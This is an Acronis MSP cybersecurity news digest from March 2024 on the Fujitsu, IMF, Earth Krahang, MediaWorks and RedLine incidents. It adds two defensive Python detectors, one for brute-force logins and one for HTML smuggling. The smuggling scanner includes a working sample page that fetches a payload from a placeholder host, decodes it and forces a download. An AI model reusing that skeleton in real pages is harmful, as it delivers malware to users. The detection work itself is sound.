March 28, 2024  —  Acronis

MSP cybersecurity news digest, March 28, 2024

Fujitsu found malware on IT systems, confirms data breach

Fujitsu, the world's sixth-largest IT services provider, with 124,000 employees and an annual revenue of USD 23.9 billion, detected malware on several of its systems, potentially resulting in the theft of customer data. Operating in over 100 countries, Fujitsu maintains a significant presence in the global market and collaborates extensively with the Japanese government on various projects, including national security initiatives and R&D projects.

Fujitsu disclosed a cybersecurity incident involving compromised systems and customer data, prompting immediate actions to isolate affected computers and enhance monitoring measures.

While investigations continue into the origin and extent of the breach, Fujitsu has notified regulatory authorities and is preparing individual notifications for affected customers.

Notably, this incident follows a similar attack in May 2021, where Fujitsu's ProjectWEB tool was exploited, compromising government agencies and exposing sensitive data, leading to subsequent security enhancements and tool replacements.

International Monetary Fund email accounts hacked in cyberattack

The International Monetary Fund (IMF) reported a cyber incident wherein 11 IMF email accounts were breached by unidentified attackers, as disclosed in a press release. Headquartered in Washington, D.C., the IMF, funded by 190 member countries, is a prominent United Nations financial agency.

Initial findings suggest that the attackers did not infiltrate any other systems beyond the compromised email accounts. The IMF stated that the affected accounts have been secured again, and the investigation is ongoing with the assistance of cybersecurity experts. Although specific details about the breach were not provided, the IMF confirmed its use of the Microsoft 365 email platform, clarifying that this incident does not seem to be a result of Microsoft being targeted.

The IMF has experienced similar incidents in the past, such as a significant breach in 2011, necessitating precautionary measures like severing network connections with the World Bank.

Chinese Earth Krahang hackers breached 70 organizations in 23 countries

An advanced hacking campaign conducted by the Chinese Advanced Persistent Threat (APT) group 'Earth Krahang' has breached 70 organizations in 23 countries, out of at least 116 organizations targeted across 45 countries, as reported by researchers.

This campaign, ongoing since early 2022, primarily focuses on government entities, compromising 48 government organizations, including 10 foreign affairs ministries, and targeting an additional 49 government agencies. Using vulnerable internet-facing servers and spear-phishing emails, the attackers deploy custom backdoors to engage in cyberespionage activities.

Earth Krahang leverages breached government infrastructure to attack other governments, establishes VPN servers on compromised systems, and brute-forces passwords for valuable email accounts. Using open-source tools, the threat actors exploit vulnerabilities in internet-facing servers to gain initial access, deploy web shells for persistence, and initiate attacks through spear-phishing, often themed around geopolitical subjects.

Additionally, Earth Krahang harvests email addresses from targets during reconnaissance and uses compromised mailboxes to send malicious attachments to further victims, while maintaining redundant access so that the loss of one foothold to detection does not end the intrusion. The threat group employs various tools and malware, including Cobalt Strike, RESHELL, and XDealer, for command execution and data collection within victim networks.
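The brute-forcing of email accounts described above leaves a characteristic trace in mail-server or identity-provider authentication logs. The following detector is an added example for this digest, not code from the researchers or from any vendor mentioned on the page; it runs over constructed sample log lines in a hypothetical `ts src= user= result=` format and flags three patterns: repeated failures from one source against one account (brute force), one source failing against several accounts in a short window (password spraying), and a success that follows a burst of failures (a likely successful guess). The thresholds and window are assumptions to be tuned to the environment.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample log lines (not real data). Format is assumed:
# <ISO timestamp> src=<ip> user=<account> result=OK|FAIL
SAMPLE_LOG = """\
2024-03-20T08:00:01Z src=203.0.113.7 user=alice@example.gov result=FAIL
2024-03-20T08:00:02Z src=203.0.113.7 user=alice@example.gov result=FAIL
2024-03-20T08:00:03Z src=203.0.113.7 user=alice@example.gov result=FAIL
2024-03-20T08:00:04Z src=203.0.113.7 user=alice@example.gov result=FAIL
2024-03-20T08:00:05Z src=203.0.113.7 user=alice@example.gov result=FAIL
2024-03-20T08:00:09Z src=203.0.113.7 user=alice@example.gov result=OK
2024-03-20T08:05:00Z src=198.51.100.4 user=bob@example.gov result=FAIL
2024-03-20T08:05:01Z src=198.51.100.4 user=carol@example.gov result=FAIL
2024-03-20T08:05:02Z src=198.51.100.4 user=dave@example.gov result=FAIL
2024-03-20T08:10:00Z src=192.0.2.10 user=erin@example.gov result=FAIL
2024-03-20T08:10:30Z src=192.0.2.10 user=erin@example.gov result=FAIL
2024-03-20T08:11:00Z src=192.0.2.10 user=erin@example.gov result=OK
this line is malformed and is skipped by the parser
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) src=(?P<src>\S+) user=(?P<user>\S+) result=(?P<res>OK|FAIL)$"
)


def parse(lines):
    """Yield (timestamp, src, user, result) for well-formed lines; skip the rest."""
    for line in lines:
        m = LINE_RE.match(line.strip())
        if m:
            ts = datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%SZ")
            yield ts, m["src"], m["user"], m["res"]


def analyze(log_text, window=timedelta(minutes=10),
            fail_threshold=5, spray_threshold=3, min_fails_before_success=3):
    """Single pass over the log, in time order, keeping only events inside `window`.

    Returns a dict with three sorted lists:
      brute_force            - (src, user) pairs with >= fail_threshold failures in a window
      password_spray         - sources failing against >= spray_threshold distinct users in a window
      success_after_failures - (src, user) pairs where an OK follows >= min_fails_before_success
                               recent failures (a likely successful guess, not a typo)
    """
    fails_by_pair = defaultdict(deque)  # (src, user) -> timestamps of recent failures
    fails_by_src = defaultdict(dict)    # src -> {user: timestamp of last failure}
    brute, spray, guessed = set(), set(), set()

    for ts, src, user, res in parse(log_text.splitlines()):
        q = fails_by_pair[(src, user)]
        # Drop failures older than the window before evaluating either rule.
        while q and ts - q[0] > window:
            q.popleft()
        if res == "FAIL":
            q.append(ts)
            if len(q) >= fail_threshold:
                brute.add((src, user))
            users = fails_by_src[src]
            users[user] = ts
            recent_users = [u for u, t in users.items() if ts - t <= window]
            if len(recent_users) >= spray_threshold:
                spray.add(src)
        else:
            # A success right after a burst of failures is the event worth paging on:
            # the brute force may have worked and the mailbox is now in attacker hands.
            if len(q) >= min_fails_before_success:
                guessed.add((src, user))

    return {
        "brute_force": sorted(brute),
        "password_spray": sorted(spray),
        "success_after_failures": sorted(guessed),
    }


if __name__ == "__main__":
    for rule, hits in analyze(SAMPLE_LOG).items():
        print(f"{rule}: {hits}")
```

Two legitimate typos followed by a success (the `erin` lines) stay below `min_fails_before_success` and are not reported; lowering that value trades noise for sensitivity. In a real deployment the same logic would run over an exported sign-in log rather than the inline sample.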

MediaWorks data breach: 2.5 million records allegedly exposed, hackers demand ransom

MediaWorks, a prominent New Zealand media company, confirmed a recent cyberattack after a post appeared on a dark web forum claiming to hold data from its website competition entries. The company responded by moving all competition entries to a new, secured database amid concerns that the breach affected these entries.

MediaWorks reiterated its commitment to data security, stating that its technology team and external experts were actively investigating the cyberattack, and pledged to share more information as the investigation progressed. The threat actor responsible, operating under the name OneERA, claimed unauthorized access to over 2.4 million records allegedly containing personally identifiable information of individuals in New Zealand.

In the aftermath of the cyberattack, the attackers resorted to blackmail, reaching out to individual victims and demanding a ransom of USD 500 in Bitcoin to prevent the public release of their data. MediaWorks acknowledged the situation and encouraged affected individuals to contact its privacy office for assistance; The Cyber Express, which reported the incident, is continuing to monitor the situation pending further updates from MediaWorks.

RedLine malware ranked the top credential stealer of the last six months

Researchers have found that RedLine malware was used to steal more than 170 million passwords in the past six months, making it the most prolific credential stealer of that period.

RedLine accounted for 47% of all stolen passwords in the dataset, more than twice the share of Vidar, the next closest stealer, which was linked to over 65 million passwords (17%). Raccoon Stealer, ranked third, was linked to over 42 million stolen passwords (11.7%). Meta, CryptBot, RisePro, StealC, AZORult, Aurora and DarkCrystal rounded out the top 10 credential stealers. The figures come from an analysis of 359 million passwords collected from known breach lists over the last six months.

In separate research, cybersecurity experts have uncovered a new malware campaign that uses fraudulent Google Sites pages and HTML smuggling to distribute AZORult, a commodity information-stealing malware. The campaign employs an unusual HTML smuggling variant in which the malicious payload is not embedded in the HTML itself but stored in a separate JSON file hosted on an external website, which the page's script fetches and decodes in the browser before triggering the download. Although the phishing campaign has not been attributed to a specific threat actor or group, it is described as widespread and aims to gather sensitive data for sale on underground forums.
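HTML smuggling pages are built from a small set of browser primitives (decode a base64 or byte-array payload, wrap it in a Blob, hand the Blob to a download link or legacy save API), and the variant above adds one more tell: a fetch of a remote `.json` resource feeding that chain. The following scanner is an added example for this digest, not code from the researchers or any vendor named on the page; it scores an HTML document on those indicators and flags it only when a download trigger, a payload-assembly step and a payload source all appear together. The two sample pages are constructed placeholders (the hypothetical URLs fetch nothing and there is no real payload), one mimicking the remote-JSON smuggling skeleton and one a benign page that merely fetches JSON to render it.

```python
import re

# Indicator regexes (assumptions chosen for this example; tune for your mail gateway).
INDICATORS = {
    # payload decoding from text to bytes
    "base64_decode": re.compile(r"\batob\s*\(|TextDecoder|fromCharCode", re.I),
    # assembling bytes into a file-like object
    "blob_build": re.compile(r"new\s+Blob\s*\(|Uint8Array", re.I),
    # forcing the browser to write the object to disk
    "download_trigger": re.compile(
        r"createObjectURL\s*\(|msSaveOrOpenBlob|\bdownload\s*=", re.I),
    # the variant from the AZORult campaign: payload pulled from a remote .json
    "remote_payload": re.compile(
        r"(fetch|XMLHttpRequest|\.open)\s*\([^)]*https?://[^)'\"]*\.json", re.I),
    # the classic variant: a large base64 string carried inside the page itself
    "large_inline_b64": re.compile(r"['\"][A-Za-z0-9+/]{2000,}={0,2}['\"]"),
}


def scan_html(html: str) -> dict:
    """Return per-indicator booleans plus a 'verdict' of 'suspicious' or 'clean'.

    A page is suspicious only when all three stages of the smuggling chain are
    present: something that supplies a payload, something that assembles it into
    bytes/Blob, and something that triggers a download. Any one stage alone is
    common in legitimate web apps and would be far too noisy on its own.
    """
    hits = {name: bool(rx.search(html)) for name, rx in INDICATORS.items()}
    payload_source = hits["remote_payload"] or hits["large_inline_b64"]
    assembles = hits["blob_build"] or hits["base64_decode"]
    hits["verdict"] = ("suspicious"
                       if hits["download_trigger"] and assembles and payload_source
                       else "clean")
    return hits


# Constructed sample 1: remote-JSON smuggling skeleton (hypothetical URL, no payload).
SMUGGLING_SAMPLE = """<html><body><p>Loading your document...</p><script>
fetch("https://sites.example/storage/payload.json").then(r => r.json()).then(j => {
  const bytes = Uint8Array.from(atob(j.data), c => c.charCodeAt(0));
  const blob = new Blob([bytes], {type: "application/octet-stream"});
  const a = document.createElement("a");
  a.href = URL.createObjectURL(blob);
  a.download = j.name;
  a.click();
});
</script></body></html>"""

# Constructed sample 2: benign page that fetches JSON only to render it.
BENIGN_SAMPLE = """<html><body><div id="out"></div><script>
fetch("https://api.example/v1/status.json").then(r => r.json()).then(j => {
  document.getElementById("out").textContent = j.status;
});
</script></body></html>"""


if __name__ == "__main__":
    for label, page in (("smuggling", SMUGGLING_SAMPLE), ("benign", BENIGN_SAMPLE)):
        print(label, scan_html(page))
```

Because the payload in this variant never appears in the HTML attachment, a scanner that only looks for large inline base64 blobs (the `large_inline_b64` rule alone) misses it; the `remote_payload` rule is what catches the JSON-hosted form, and the combined verdict keeps ordinary JSON-consuming pages from being flagged.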